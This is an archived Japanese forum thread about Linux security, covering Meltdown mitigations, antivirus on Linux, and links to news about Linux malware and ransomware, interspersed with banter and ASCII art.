[0277 login:Penguin 2022/03/31(木) 08:38:02.95 ID:8KbeFvKq]

「meltdown」では何も出来ないとしても、
「meltdownのようなハードを対象とした攻撃」は他にもある／今後発生するかもしれないでしょ

[0278 login:Penguin 2022/03/31(木) 11:16:00.89 ID:3Q2itE4U]

meltdown は権限のない場所のメモリ内容を盗み見る攻撃。ログインパスワードなどの重要情報を盗まれる可能性がある。
もちろん最新のOSを使っていれば対策されているのでできない（はず）。
一方で類似の攻撃手段は毎年のように開発されている。

[0279 login:Penguin 2022/03/31(木) 13:02:29.46 ID:hrFKApv5]

カーネルでメルトダウンの対策を無効にすると30%程度パフォーマンスが上がるような記事を昔見た

[0280 login:Penguin 2022/03/31(木) 13:41:31.15 ID:3Q2itE4U]

30%はかなり大げさ。ショート・パケットで大量IOしてるようなシステムでなければ、そこまで変わらない。
普通10%くらいじゃないかな。他の攻撃への対策にもなっているので off にするのは推奨されない。

[0281 login:Penguin 2022/03/31(木) 21:33:05.86 ID:6gTUptRM]

wineでexcelマクロ動かして脆弱性をついてさらにメルトダウンでって
ハードル高くてほぼ不可能じゃね。

[0282 login:Penguin 2022/04/15(金) 17:17:49.06 ID:qZl81aXi]

津波がここまで来るなんてありえないんじゃね？
とか思ってて東日本壊滅一歩手前だったことを
もう忘れたのだろうか

[0283 login:Penguin 2022/04/16(土) 02:56:12.12 ID:/WJtMY4I]

ま、それならドアに鍵1000個つけて暮らすといいよ。
安全だから。

[0284 login:Penguin 2022/04/16(土) 05:31:13.38 ID:n2rPNAGD]

ドアに鍵1000個つけると津波がこないんだ
へーすごーい　それどこのカルト宗教？

[0285 login:Penguin 2022/04/16(土) 06:21:24.35 ID:UdUglJWb]

津波は例えで言ってるだけで誰もそこに言及してないんだが読解力ドベなのかな

[0286 login:Penguin 2022/04/16(土) 06:47:13.85 ID:n2rPNAGD]

「それなら」でつないでおいてその言い訳は恥ずかしくないの？

[0287 login:Penguin 2022/04/16(土) 06:56:41.20 ID:9P5KPh3C]

>>282をもう一度よく読んでみようか文盲

[0288 login:Penguin 2022/04/16(土) 08:47:04.64 ID:L5OHmyPk]

馬鹿同士仲良くしろって

ま、馬鹿だからするんだろうけど・・・

[0289 login:Penguin 2022/04/16(土) 10:13:31.21 ID:60ZvNABA]

無いことを証明するのは悪魔の証明で不可能だから、普通の人は普通に考えたら現実的に起こり得ない事は｢無い｣って表現するけどプログラマは｢無いとは言えない｣って表現する
みたいな冗談どっかで見たんだけどどこだったかな…

[0290 login:Penguin 2022/04/17(日) 03:29:35.74 ID:d7BRhfM8]

コスト計算ができないおバカ多いよね。

[0291 login:Penguin 2022/04/17(日) 10:10:38.56 ID:VG7mWIvn]

けんかをやめて
二人を止めて

[0292 login:Penguin 2022/04/18(月) 17:23:14.19 ID:mAXwkcvQ]

1月からsophosアップデート失敗してたわ

[0293 login:Penguin 2022/05/02(月) 05:57:32.08 ID:v2q/MbXG]

eset nod32は今年の第3四半期に終了か

[0294 login:Penguin 2022/05/13(金) 18:58:08.52 ID:G/Ft5pt5]

これLinuxに関係ある？
NVD - CVE-2022-26809
https://nvd.nist.gov/vuln/detail/CVE-2022-26809

[0295 login:Penguin 2022/05/18(水) 16:49:18.16 ID:Qx87b8Vd]

rootで使わなきゃ何とかなるっていうけど
しょっちゅうパスワード求められて麻痺しちゃってるから、いざウィルスか何かがパスワード求めてきてもうっかり入れちゃいそうな気がする

[0296 login:Penguin 2022/05/20(金) 20:12:55.49 ID:c+i/ftSn]

>>295
すげぇ分かる

[0297 login:Penguin 2022/07/01(金) 12:14:40.96 ID:X1LGMm+v]

ランレベル3からgui起動するとモッサリ動作になるのね
ランレベル5ならサクッと動く

[0298 login:Penguin 2022/07/01(金) 20:19:27.91 ID:K96O39HQ]

そもそもlinuxは安全、セキュリティーソフト入れる方が危険になるわ

[0299 login:Penguin 2022/07/02(土) 21:28:58.41 ID:Z/sLdlGP]

linuxにセキュリティーソフトを求める奴はlinux使わない方が身の為

[0300 login:Penguin 2022/07/02(土) 21:59:28.84 ID:5BjrO4EH]

よけいなサービス、アプリを稼働させると一般にセキュリティが落ちるよ
Google Chromeなんてバックグラウンドで勝手に実行するんだって

[0301 login:Penguin 2022/07/03(日) 16:06:45.65 ID:djLtolpz]

クラムウィン使っとる

[0302 login:Penguin 2022/07/03(日) 16:07:38.41 ID:djLtolpz]

ウィンじゃなかった

[0303 login:Penguin 2022/07/05(火) 02:21:06.25 ID:6gRGIkVI]

クラムボンはわらったよ

[0304 login:Penguin 2022/07/11(月) 18:34:10.16 ID:kXR8bOak]

「Linux」マルウェア「OrBit」発見--検出、削除が難しい新種 - ZDNet Japan
https://japan.zdnet.com/article/35190234/

[0305 login:Penguin 2022/07/11(月) 18:52:11.08 ID:yZJnVccn]

dropperをユーザーが自分でインストールしないといけないような類の奴を過剰に騒ぐのって逆効果だよな
そのせいでACEって何？RCEって何？ってレベルの馬鹿が勘違いして｢Linuxでは自分で馬鹿なことしない限り安全なんですぅー！！！｣みたいなイキり方しがちだし

[0306 login:Penguin 2022/07/11(月) 23:53:00.18 ID:aOWuriZy]

>>304
そのマルウェアを仕込まれる条件が一番の問題だろう
そいつが何ができるとか二の次

[0307 login:Penguin 2022/07/12(火) 19:36:54.50 ID:g39esm2o]

経路の例
「従業員情報が暗号化され、復号不能」　ランサムウェア「CryptXXX」攻撃受け　カワムラグループ - ITmedia NEWS
https://www.itmedia.co.jp/news/spv/2207/12/news106.html

なんでもパッチ当たってないVPNがヤベーんだとよ

[0308 login:Penguin 2022/07/12(火) 22:42:38.59 ID:0gQlELZD]

IPAがゼロトラストセキュリティ入門資料を公開　基礎知識や心構え、検討の流れなど解説 - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2207/12/news129.html

関連情報
今更聞けない「ゼロトラストセキュリティ」の基本　具体的にはどう守る？ - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2010/16/news172.html

[0309 login:Penguin 2022/07/12(火) 22:47:43.62 ID:0gQlELZD]

悪用続く「Log4Shell」　対応放置の企業はランサムウェア感染など二次被害　「パッチ適用を怠れば、コストは増大」： この頃、セキュリティ界隈で - ITmedia NEWS
https://www.itmedia.co.jp/news/spv/2207/12/news061.html

[0310 login:Penguin 2022/09/12(月) 18:25:32.18 ID:QlS3Rpr8]

Powerful New Linux Malware Shikitega Uses Unusual Multi-Stage Stealth
https://it.slashdot.org/story/22/09/11/0314234/powerful-new-linux-malware-shikitega-uses-unusual-multi-stage-stealth

[0311 login:Penguin 2022/09/18(日) 15:34:09.33 ID:6jdCgZUV]

不正アクセスに注意されたし

inetnum: 188.115.182.0 - 188.115.185.255
netname: TENET
descr: TeNeT Networking Centre
descr: Odessa Ukraine

[0312 login:Penguin 2022/10/10(月) 16:37:16.45 ID:0A3GS1UX]

JVNTA#96784241
VLAN対応ネットワーク機器において、L2保護機構がバイパスされる問題
https://jvn.jp/ta/JVNTA96784241/

[0313 login:Penguin 2022/10/20(木) 13:37:32.96 ID:Zy5/zOs3]

メモリー上に直接マルウェアを展開する攻撃を発見--家庭用PCが標的
https://japan.zdnet.com/article/35194695/

[0314 login:Penguin 2022/12/08(木) 22:21:27.92 ID:l3DluBSK]

Parrot Security
https://www.parrotsec.org/download/
https://bunny.deb.parrot.sh//parrot/iso/5.1.2/Parrot-home-5.1.2_amd64.iso
5fe197d3381a4cc816eb523c32532076 Parrot-home-5.1.2_amd64.iso
b04b4ea5bcbff79d5a098cd6524296a37d2f7ee7 Parrot-home-5.1.2_amd64.iso
b907e0dc4ba156566471a8a271ddd575a7af2c5af4cc8bc18a949cc3 Parrot-home-5.1.2_amd64.iso
8ed307e7a135ee3bca048abf609ed8af22ecae5fb0e1c72472d39929c7cf827a Parrot-home-5.1.2_amd64.iso
34e4171853fe502b3130d0c82da5af9fd15b79b910fe9a03c83aa522eea1042d40e1ca10e294259584ab5467b8be5e33 Parrot-home-5.1.2_amd64.iso
98001b8c49f2eeb44cb354b630a43681c2c1bb6e6ad15e3c0d70fdcf8e5f85d918cd9b8afa91f546b7f93d158e98858722db17e2b7e209321dc93d2980e05cb8 Parrot-home-5.1.2_amd64.iso

[0315 login:Penguin 2023/02/19(日) 19:46:37.61 ID:j798oBCu]

　　 /^^ヽ
　　（｡・-・）　ﾔｯﾎ
　　 ﾟし-J
　　（｡・-・）.｡ｏＯ( お〜い )
　　 ﾟし-J

[0316 login:Penguin 2023/04/17(月) 18:57:08.99 ID:KAmRT7oi]

　　　　　 (V)∧_∧(V)
　　　　　　ヽ(･ω･)ノ　　ﾌｫｯﾌｫｯﾌｫｯ
　 　　　　　 /　 /
　　　　　　 ノ￣ゝ

[0317 login:Penguin 2023/04/17(月) 23:16:26.34 ID:DooHb9mZ]

昔ESET入れたら半端無く重くなって驚いた思い出。

[0318 login:Penguin 2023/05/10(水) 02:01:28.21 ID:q4Z5Qt7r]

　　　　　　　　　　　　i"＼ ))
　　　　　　　　　　　　| 8　 )
　　　　 　 　 　 ∧,,,∧∩-''"
　　　　　 ＿ ..(´･ω･`)彡　ズロース ズロース ! !
　　　〃（＼ ∞ ,⊂彡
　　　　　｀ヽ)_ノ|　　　|　
　　　　　　　 　 し⌒Ｊ 　　

[0319 login:Penguin 2023/07/21(金) 11:38:21.39 ID:dnV52bFu]

　　　＿＿＿
　 　(＼ ∞ ﾉ　　
　　　ヽ)＿ﾉ　 暑くても履いてくださいね〜

[0320 login:Penguin 2023/09/30(土) 22:48:18.82 ID:0rNJpOGK]

　　　　　 (V)∧_∧(V)
　　　　　　ヽ(･ω･)ノ　　ズロース ﾌｫｯ !
　 　　　　　 /　 /
　　　　　　 ノ￣ゝ

[0321 login:Penguin 2024/01/09(火) 00:57:06.45 ID:Drc3Iy8x]

　　 /^^ヽ
　　（｡・-・）　ﾔｯﾎ
　　 ﾟし-J
　　（｡・-・）.｡ｏＯ( お〜い )
　　 ﾟし-J

[0322 login:Penguin 2024/02/14(水) 17:19:04.54 ID:WjA0v6iO]

　　　　　　　＿＿＿
　　　　　 　(＼ ∞ ﾉ　　
　　　　　　　ヽ)＿ﾉ　

[0323 login:Penguin 2024/03/14(木) 01:02:21.72 ID:CjKcJTG+]

　　ノ~ヽ
　(＿∞_)
　（ ´・ω・) ∫　
　//＼￣￣旦＼
／/ ※＼＿＿＿＼
＼＼ 　※ 　※ ※ ヽ
　 ＼ヽ-―――――ヽ